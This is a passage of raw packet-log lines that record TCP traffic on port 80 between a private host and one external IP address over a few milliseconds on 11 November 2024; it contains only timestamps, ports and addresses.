Nov 11, 2024 10:33:25.826786995 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.826798916 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.826809883 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.826812983 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.826822996 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.826832056 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.826848984 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.826853991 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.826867104 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.826879025 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.826879025 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.826879025 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.826889992 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.826896906 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.826922894 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.826930046 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.826936007 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.826947927 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.826958895 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.826968908 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.826970100 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.826982021 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.826986074 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.826992989 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827003956 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827016115 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827016115 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827032089 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827042103 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827059031 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827074051 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827085018 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827090979 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827095985 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827109098 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827119112 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827121019 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827132940 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827136993 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827143908 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827157021 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827167034 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827167988 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827181101 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827198982 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827207088 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827219963 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827231884 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827241898 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827243090 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827255011 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827265978 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827269077 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827276945 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827287912 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827295065 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827301979 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827317953 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827318907 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827328920 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827333927 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827348948 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827359915 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827382088 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827394009 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827397108 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827405930 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827418089 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827419043 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827429056 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827440977 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827446938 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827452898 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827464104 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827476025 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827483892 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827498913 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827510118 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827526093 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827529907 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827537060 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827548981 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827553034 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827567101 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827573061 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827588081 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827589989 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827603102 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827614069 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827616930 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827629089 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827636003 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827640057 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827652931 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827655077 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827663898 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827675104 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827682018 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827686071 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827711105 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827711105 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827716112 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827728033 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827742100 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827748060 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827754974 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827763081 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827768087 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827780008 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827789068 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827791929 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827804089 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827805042 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827817917 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827828884 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827832937 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827857018 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827867031 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827878952 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827878952 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827904940 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827917099 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827918053 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827928066 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827939987 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827946901 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827951908 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827965021 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827975035 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.827976942 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.827990055 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828001022 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828006029 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828011990 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828017950 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828037977 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828041077 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828053951 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828063965 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828063965 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828072071 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828075886 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828088045 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828092098 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828093052 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828104973 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828111887 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828115940 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828125000 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828130007 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828142881 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828152895 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828165054 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828177929 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828191996 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828202009 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828212023 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828219891 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828222990 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828237057 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828248024 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828250885 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828258991 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828258991 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828272104 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828286886 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828310013 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828321934 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828321934 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828336954 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828349113 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828360081 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828370094 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828371048 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828382969 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828393936 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828401089 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828406096 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828411102 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828418970 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828444004 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828459024 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828469038 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828471899 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828484058 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828497887 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828509092 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828519106 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828525066 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828552008 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828552961 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828564882 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828572989 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828576088 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828588963 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828594923 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828599930 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828607082 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828610897 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828623056 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828633070 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828635931 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828645945 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828650951 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828658104 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828671932 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828689098 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828701019 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828701019 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828713894 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828725100 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828731060 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828736067 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828747988 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828749895 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828762054 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828773975 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828783989 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828784943 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828797102 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828810930 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828814030 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828823090 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828852892 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828855991 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828877926 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828888893 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828900099 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828903913 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828912020 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828923941 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828924894 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828934908 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828947067 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828960896 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828964949 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828973055 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828984022 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828984022 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.828990936 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.828998089 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829009056 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829020023 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829020977 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829034090 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829045057 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829051971 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829065084 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829075098 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829076052 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829087973 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829097033 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829099894 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829112053 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829121113 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829123020 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829134941 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829145908 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829145908 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829159021 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829161882 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829169989 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829181910 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829190969 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829195023 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829205990 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829216003 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829216957 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829229116 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829236984 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829241037 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829252958 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829263926 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829267025 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829276085 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829284906 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829288006 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829301119 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829312086 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829313040 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829323053 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829325914 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829339027 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829349041 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829358101 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829360962 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829375982 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829381943 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829396009 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829401016 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829413891 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829425097 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.829425097 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829442978 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.829457998 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.830218077 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830229044 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830240965 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830251932 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830262899 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830265999 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.830276012 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830286026 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.830302954 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830312014 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.830315113 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830327034 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830338001 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830343962 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.830348969 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830362082 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830368996 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.830374002 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830387115 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830398083 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830399036 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.830410004 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.830440998 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.830445051 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830456972 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830466032 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830476999 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830487967 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830488920 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.830498934 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830511093 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830521107 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830526114 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.830533028 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830543995 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830547094 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.830555916 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830570936 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.830585003 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830585957 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.830602884 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830614090 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.830615044 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830627918 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.830631971 CET	49747	80	192.168.2.5	185.215.113.206
